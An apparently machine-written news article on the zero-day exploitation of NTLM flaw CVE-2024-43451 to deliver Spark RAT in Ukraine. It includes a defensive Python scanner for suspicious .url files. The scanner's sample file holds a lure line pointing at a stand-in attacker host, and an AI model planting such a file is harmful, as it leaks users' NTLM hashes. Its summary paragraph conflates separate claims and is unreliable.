Ethical Hacking News
New Zero-Day Exploited to Deploy RAT Malware via NTLM Flaw
A newly discovered security flaw in Windows NT LAN Manager (NTLM) was exploited as a zero-day by suspected Russian actors as part of cyber attacks targeting Ukraine. A detailed analysis reveals how this vulnerability was used to deploy the open-source Spark RAT malware and highlights the evolving threat landscape in the cybersecurity world.
Russian hackers exploited a zero-day flaw in Windows NT LAN Manager (NTLM) to deploy Remote Access Trojan (RAT) malware. The vulnerability, CVE-2024-43451, has been patched by Microsoft, but systems that have not applied the update remain exploitable. A separate phishing campaign with tax-related lures was used to distribute LiteManager, a legitimate remote desktop tool. Russian hackers could steal funds from accountants' computers using NTLM hash disclosure spoofing within an hour of the initial attack.
The cybersecurity landscape has recently witnessed a concerning development: Russian hackers have successfully exploited a newly patched security flaw in Windows NT LAN Manager (NTLM) to deploy a Remote Access Trojan (RAT). The vulnerability, identified as CVE-2024-43451 with a CVSS score of 6.5, is an NTLM hash disclosure spoofing flaw that can be abused to steal a user's NTLMv2 hash. In this article, we will delve into how this zero-day flaw was exploited by suspected Russian actors and the attack chain that ensued.
Microsoft patched this vulnerability in its latest security update. However, as with many software patches, malicious actors had discovered and exploited the flaw before a fix was available. In this instance, Israeli cybersecurity company ClearSky discovered the zero-day exploitation of the flaw in June 2024. The discovery was made through a thorough analysis of malicious activity observed on compromised systems.
According to ClearSky, the vulnerability was exploited as part of an attack chain designed to deliver the open-source Spark RAT malware. The chain began with phishing emails sent from a compromised Ukrainian government server that prompted recipients to renew their academic certificates by opening a booby-trapped URL file embedded in the message. When a victim interacted with this URL file, it established connections with a remote server to download additional payloads, including Spark RAT.
Furthermore, ClearSky noted that once the interaction with the malicious URL file caused the victim's NTLM (NT LAN Manager) hash to be sent over the SMB (Server Message Block) protocol, the attacker could capture it and carry out a Pass-the-Hash attack. This would allow them to authenticate as the user associated with the captured hash without needing the corresponding password.
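As an added defensive illustration (not code from the article, ClearSky, or CERT-UA), the script below scans Internet Shortcut (.url) files for targets that reference a remote host via a UNC path or a file:// URL, the kind of reference that makes Windows attempt an outbound SMB authentication and hand over the NTLM hash. It assumes the lure takes that form; the host names in the samples are constructed and hypothetical.

```python
import re
from pathlib import Path

# Constructed sample .url files (hypothetical hosts, not indicators from the article).
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=file://attacker.example/share/renew-certificate.pdf
IconIndex=0
"""

BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.org/
"""

UNC_RE = re.compile(r"^\\\\[^\\]+\\")                        # \\host\share\...
FILE_URL_RE = re.compile(r"^file://([^/]+)/", re.IGNORECASE)  # file://host/...


def parse_url_file(text):
    """Return the key/value pairs of the [InternetShortcut] section (keys lower-cased)."""
    values = {}
    in_section = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip().lower()] = value.strip()
    return values


def remote_targets(text):
    """List (field, host) pairs for every field whose value points at a remote host.

    A UNC path (\\\\host\\share) or a file:// URL with a non-local host would
    trigger an outbound SMB connection, and with it an NTLM authentication attempt.
    """
    findings = []
    for field, value in parse_url_file(text).items():
        if UNC_RE.match(value):
            findings.append((field, value.split("\\")[2]))
        else:
            match = FILE_URL_RE.match(value)
            if match and match.group(1).lower() not in ("", "localhost"):
                findings.append((field, match.group(1)))
    return findings


def scan_directory(root):
    """Map each .url file under root to its remote targets (empty list = nothing flagged)."""
    return {str(p): remote_targets(p.read_text(errors="ignore"))
            for p in Path(root).rglob("*.url")}
```

Run `scan_directory` over a mail download folder or quarantine share; any non-empty entry is worth an analyst's look, and blocking outbound SMB (TCP 445) at the perimeter stops the hash from leaving regardless of the lure's form.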
In addition to this attack chain, it has come to light that Russian hackers have been using phishing emails bearing tax-related lures to distribute LiteManager, a legitimate remote desktop tool. The CERT-UA agency in Ukraine has linked these activities to two likely threat actors: UAC-0194 and UAC-0050.
One critical aspect of this story is the warning issued by the Computer Emergency Response Team of Ukraine (CERT-UA) regarding the risk faced by accountants whose computers work with remote banking systems. According to CERT-UA, it may take no more than an hour from the moment of the initial attack to the moment of theft of funds.
In conclusion, a new zero-day exploit has been discovered that abuses a recently patched NTLM vulnerability to deploy RAT malware via phishing emails. The Russian actors behind this exploitation highlight the evolving threat landscape and the need for continuous vigilance in cybersecurity.
Related Information:
https://thehackernews.com/2024/11/russian-hackers-exploit-new-ntlm-flaw.html
https://thehackernews.com/2024/02/russian-apt28-hackers-targeting-high.html
https://nvd.nist.gov/vuln/detail/CVE-2024-43451
https://www.cvedetails.com/cve/CVE-2024-43451/
Published: Thu Nov 14 01:45:30 2024 by llama3.2 3B Q4_K_M